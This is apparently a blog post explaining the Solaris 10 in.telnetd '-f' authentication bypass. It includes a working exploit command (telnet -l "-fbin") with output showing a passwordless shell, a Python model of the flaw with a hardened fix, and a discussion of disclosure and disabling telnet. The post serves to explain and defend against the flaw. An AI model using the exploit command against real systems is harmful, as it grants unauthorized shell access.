
Solaris 10’s in.telnetd exploit.

My telnet mantra has always been ‘Telnet is only dangerous if you use it’. Leaving it enabled as an emergency way in during ssh upgrades, for example, is a good idea. It is better still to leave it enabled but visible only to your home or office network, and to use it only when the path between your desktop and the server running telnet never leaves your own switched network.

All this changed at the weekend with the disclosure of a flaw in the authentication model of Solaris’ in.telnetd: the user name supplied by the telnet client (the -l argument, carried to the server by the telnet environment option) is handed to login(1) without being checked, so a value beginning with ‘-f’ is parsed as login’s -f option, which tells login that the user has already been authenticated and that no password is needed. To try it out, first enable telnet

# inetadm -e telnet

Then connect from another machine in this way:

factory:~ andy$ telnet -l "-fbin" grumps.nosignal.org
Trying 213.232.80.121...
Connected to grumps.nosignal.org.
Escape character is '^]'.
couldn’t set locale correctly
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
————————————————————

Welcome to grumps.
$

Then (quickly) disable telnetd with an

# inetadm -d telnet
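To show why that one odd-looking user name is enough, here is an added example that models the mechanism rather than reproducing Sun's code: it builds the argument vector a telnetd-style server would hand to login(1), once in the vulnerable shape (the client-supplied name appended as a bare argument) and once in a hardened shape (name validated and option parsing terminated with "--"), and then parses each the way a getopt-based login would. The option string, the argument layout and the hardened form are assumptions for illustration, not the Solaris 10 in.telnetd command line or Sun's patch.

```python
import getopt

# Assumed option string for login(1): -f user (already authenticated),
# -p (preserve environment), -h host, -d tty. Illustrative only.
LOGIN_OPTS = "f:ph:d:"


def build_login_args_vulnerable(remote_host, user):
    """Vulnerable construction (assumed shape): the user name taken from the
    client's -l / USER value is appended as a bare argument, so login's
    option parser is free to interpret it as an option."""
    return ["-p", "-h", remote_host, user]


def build_login_args_hardened(remote_host, user):
    """Hardened construction (an assumed fix, not Sun's patch): refuse any
    user name that looks like an option, and put '--' before the name so
    getopt stops treating what follows as options."""
    if not user or user.startswith("-"):
        raise ValueError("refusing user name that looks like an option: %r" % user)
    return ["-p", "-h", remote_host, "--", user]


def parse_as_login_would(argv):
    """Parse argv as a getopt-based login(1) would.

    Returns (skip_auth, forced_user, positional_user): skip_auth is True when
    a -f option was consumed, forced_user is its argument, and positional_user
    is the first non-option argument (the name login would actually prompt for).
    """
    opts, rest = getopt.getopt(argv, LOGIN_OPTS)
    forced_user = None
    for flag, value in opts:
        if flag == "-f":
            forced_user = value
    positional_user = rest[0] if rest else None
    return (forced_user is not None, forced_user, positional_user)


def demo(user="-fbin", remote_host="factory"):
    """Run both constructions for one client-supplied user name.

    The default reproduces the post's `telnet -l "-fbin"`: constructed input,
    with 'factory' standing in for the connecting host."""
    vulnerable = parse_as_login_would(build_login_args_vulnerable(remote_host, user))
    try:
        hardened = parse_as_login_would(build_login_args_hardened(remote_host, user))
    except ValueError as exc:
        hardened = ("rejected", str(exc))
    return vulnerable, hardened


if __name__ == "__main__":
    vulnerable, hardened = demo()
    # Vulnerable path: getopt reads '-fbin' as -f with argument 'bin', so login
    # skips authentication and starts a shell as bin.
    print("vulnerable login argv ->", vulnerable)
    # Hardened path: the name is rejected before login is ever executed.
    print("hardened login argv   ->", hardened)
```

Note that the "--" terminator alone is a weaker defence than the leading-dash check: with "--" in place, "-fbin" reaches login as a literal, non-existent user name and authentication fails, but refusing the name outright keeps a hostile value away from login entirely. On a real Solaris 10 host the check that matters is that `inetadm | grep telnet` reports the service disabled once you have finished experimenting.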

This attack raises some questions; the most interesting ones, in my mind, are these:

  • Does the publication of this flaw support or undermine the open source model?

The flaw was only discovered because the source to in.telnetd had been released as part of the OpenSolaris project. Had the code not been released, this flaw would not have been noticed (yet), and it might instead have been picked up by the vendor and handled discreetly. On the other hand, releasing the code to the community turned up the flaw quickly, so does the open source model lead to inherently more secure code?

  • Is a mail to full-disclosure the best way to handle vulnerabilities?

It is certainly much more polite to contact the vendor so that a structured damage-limitation exercise can begin! I don’t care that someone picks up a vulnerability in the software I use, as long as the vendor is one of the first people to find out. With open source software there is sometimes no central ‘vendor’ to inform, but commercial companies, and huge projects like the Mozilla Foundation, certainly have one. The person who reported this to full-disclosure may have tried to tell Sun first, but there is no evidence to suggest so.

Well, Sun have released a patch in any case, but now that my remote Sun boxes have Lights Out Management cards, I think it is time for a new mantra: Let Telnet Die. I still maintain that it is not inherently less secure than ssh (if used with ssl, of course), and perhaps more secure than ssh, because the port-forwarding features of ssh aren’t present; but in the interests of exposing as little as possible to the outside world, I’m leaving it turned off.
